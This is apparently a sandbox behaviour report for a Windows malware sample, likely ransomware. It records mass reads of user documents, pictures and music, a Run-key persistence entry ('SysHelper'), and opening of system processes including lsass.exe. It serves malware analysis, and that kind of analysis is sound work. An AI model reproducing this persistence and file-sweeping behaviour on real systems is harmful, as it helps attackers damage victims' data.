Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url	size = 153605, size_out = 133	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url	size = 153605, size_out = 133	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url	size = 153605, size_out = 133	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url	size = 153605, size_out = 133	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url	size = 153605, size_out = 133	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url	size = 153605, size_out = 133	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url	size = 153605, size_out = 133	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url	size = 153605, size_out = 133	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url	size = 153605, size_out = 133	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\LJP4K.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\LJP4K.m4a	size = 153605, size_out = 6135	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\-Bnbr4EKB.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\-Bnbr4EKB.m4a	size = 153605, size_out = 8357	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\DD0VSBvifKy.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\DD0VSBvifKy.wav	size = 153605, size_out = 66842	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\mt-NxS9.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\mt-NxS9.m4a	size = 153605, size_out = 88220	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\_US29v3kaQayesknOB.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\_US29v3kaQayesknOB.wav	size = 153605, size_out = 32849	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\71f4 4SP91MVI3\pakuYqh.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\71f4 4SP91MVI3\pakuYqh.png	size = 153605, size_out = 97006	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\9I3wBfC.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\9I3wBfC.png	size = 153605, size_out = 99015	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\gXqHnWD.bmp	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\gXqHnWD.bmp	size = 153605, size_out = 18228	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\pWM7.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\pWM7.png	size = 153605, size_out = 53802	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\3J2ydx.jpg	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\3J2ydx.jpg	size = 153605, size_out = 60569	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\3uz9sjygz2I9u-5T7p.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\3uz9sjygz2I9u-5T7p.png	size = 153605, size_out = 81910	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\dbSz.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\dbSz.png	size = 153605, size_out = 25297	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\XHt9VP7ib.gif	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\XHt9VP7ib.gif	size = 153605, size_out = 29199	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\_iolZcQAgtC1ACM.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\_iolZcQAgtC1ACM.png	size = 153605, size_out = 56388	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\ampfWs0z5kbstxRZUv.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\ampfWs0z5kbstxRZUv.png	size = 153605, size_out = 80449	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\HAJ2zHK0.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\HAJ2zHK0.png	size = 153605, size_out = 77604	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\lJDyJz4X_LOUsSG.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\lJDyJz4X_LOUsSG.png	size = 153605, size_out = 85823	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\Xu0FJPBCEsMrFdRg0wfb.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\Xu0FJPBCEsMrFdRg0wfb.png	size = 153605, size_out = 59276	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\y0VZOX.jpg	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\y0VZOX.jpg	size = 153605, size_out = 15611	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\1XL3nUBpXBByeYM.avi	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\1XL3nUBpXBByeYM.avi	size = 153605, size_out = 16829	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\bps8RA.avi	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\bps8RA.avi	size = 153605, size_out = 1228	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\cpBN4K954GbZNf.mp4	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\cpBN4K954GbZNf.mp4	size = 153605, size_out = 22741	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\GpZ VRAn1yi_-.swf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\GpZ VRAn1yi_-.swf	size = 153605, size_out = 26550	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\IiTufgt.mp4	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\IiTufgt.mp4	size = 153605, size_out = 84769	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\jXsioQ.swf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\jXsioQ.swf	size = 153605, size_out = 7069	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\LV_qcOmmob.mkv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\LV_qcOmmob.mkv	size = 153605, size_out = 39504	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\mR73VRvHqMlHdz.mp4	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\mR73VRvHqMlHdz.mp4	size = 153605, size_out = 58638	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\s-v3cZbpeiJD1yTvhr.swf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\s-v3cZbpeiJD1yTvhr.swf	size = 153605, size_out = 8178	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\UAJvNRac055.avi	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\UAJvNRac055.avi	size = 153605, size_out = 64581	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\x6E1GbuOZBC_86.swf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\x6E1GbuOZBC_86.swf	size = 153605, size_out = 21131	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\Zmx9tyz7RoVpEsv00H.flv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\Zmx9tyz7RoVpEsv00H.flv	size = 153605, size_out = 68118	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\6ften7Ta9q8fR_DlLE.mp4	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\6ften7Ta9q8fR_DlLE.mp4	size = 153605, size_out = 27742	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\8ndf-ek48BAm.jpg	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\8ndf-ek48BAm.jpg	size = 153605, size_out = 53178	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\PkQ0fGsu5.csv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\PkQ0fGsu5.csv	size = 153605, size_out = 30798	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\SGPp8BH7eiOdE.mp3	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\SGPp8BH7eiOdE.mp3	size = 153605, size_out = 36999	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\u5VpH1Gfjec38H3.jpg	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\u5VpH1Gfjec38H3.jpg	size = 153605, size_out = 29680	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\wCHfAt0k5.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\wCHfAt0k5.wav	size = 153605, size_out = 84248	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\-pPGVSgI.ppt	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\-pPGVSgI.ppt	size = 153605, size_out = 81061	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\Dk-mCKfeMJ.xls	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\Dk-mCKfeMJ.xls	size = 153605, size_out = 72181	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\f7Iu.ppt	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\f7Iu.ppt	size = 153605, size_out = 21978	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\hv8Rvu6GKv.ppt	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\hv8Rvu6GKv.ppt	size = 153605, size_out = 73949	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\VoZWZdD.xls	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\VoZWZdD.xls	size = 153605, size_out = 37797	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\_-u6ogOGtJDh_andzkIr.odt	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\_-u6ogOGtJDh_andzkIr.odt	size = 153605, size_out = 101036	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0X9H7M.ppt	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0X9H7M.ppt	size = 153605, size_out = 47677	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\8RDB7k.doc	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\8RDB7k.doc	size = 153605, size_out = 21922	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\e6btBcfWeC9TI4.pps	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\e6btBcfWeC9TI4.pps	size = 153605, size_out = 57524	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\FtBJIQkicPBzsMWmM5J.rtf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\FtBJIQkicPBzsMWmM5J.rtf	size = 153605, size_out = 48748	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\j3Zk5qyJiGa6pOh.odp	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\j3Zk5qyJiGa6pOh.odp	size = 153605, size_out = 4701	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\0jha7Ez6BS.ods	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\0jha7Ez6BS.ods	size = 153605, size_out = 32456	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\6iJuvel1.odt	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\6iJuvel1.odt	size = 153605, size_out = 73404	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\BR7Cji.doc	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\BR7Cji.doc	size = 153605, size_out = 79440	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\DQcA9QRfBGkKr w6.docx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\DQcA9QRfBGkKr w6.docx	size = 153605, size_out = 46987	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\WAQy.xlsx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\WAQy.xlsx	size = 153605, size_out = 35748	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico	size = 153605, size_out = 29926	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\oJv-O\-RJ_rXnG1_.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\oJv-O\-RJ_rXnG1_.m4a	size = 153605, size_out = 75683	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\oJv-O\vDiwpl_QLurQQz6.mp3	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\oJv-O\vDiwpl_QLurQQz6.mp3	size = 153605, size_out = 102002	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\sHdKY9oX2.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\sHdKY9oX2.m4a	size = 153605, size_out = 86019	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\smH64uN0q8.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\smH64uN0q8.wav	size = 153605, size_out = 70715	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\v _P9.mp3	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\v _P9.mp3	size = 153605, size_out = 6882	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\ylebE_y3_yj.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\ylebE_y3_yj.m4a	size = 153605, size_out = 71201	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\NiLbAzC1YwUFTvZqU.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\NiLbAzC1YwUFTvZqU.wav	size = 153605, size_out = 99847	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\rqr FeHB_E8CueZs9.mp3	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\rqr FeHB_E8CueZs9.mp3	size = 153605, size_out = 89466	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\VpT_TcidUDkQuxNiXW9.mp3	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\VpT_TcidUDkQuxNiXW9.mp3	size = 153605, size_out = 12006	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\3mMy51V.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\3mMy51V.wav	size = 153605, size_out = 45682	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\L4TT06vVg0ef.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\L4TT06vVg0ef.m4a	size = 153605, size_out = 68711	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\WBMmCD2Hu9jcGCg.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\WBMmCD2Hu9jcGCg.wav	size = 153605, size_out = 35849	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\fQS43pyYf93X_Ex4mvdQ.jpg	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\fQS43pyYf93X_Ex4mvdQ.jpg	size = 153605, size_out = 11339	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\Mw3Rg1vX.bmp	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\Mw3Rg1vX.bmp	size = 153605, size_out = 43863	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\oWuD6cFhx.bmp	size = 38, size_out = 38	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\Music\U3NMPiDKOwkRxmiQp.m4a	size = 74564	1	Fn Data
For performance reasons, the remaining 709 entries are omitted. The remaining entries can be found in glog.xml.

Registry (5)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion	-	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe" --AutoStart, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion	value_name = SysHelper, data = 0, type = REG_NONE	1	Fn
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion	value_name = SysHelper, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn

Process (28)

Operation	Process	Additional Information	Count	Logfile
Enumerate Processes	-	-	1	Fn
Open	System	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\userinit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\rundll32.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dinotify.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
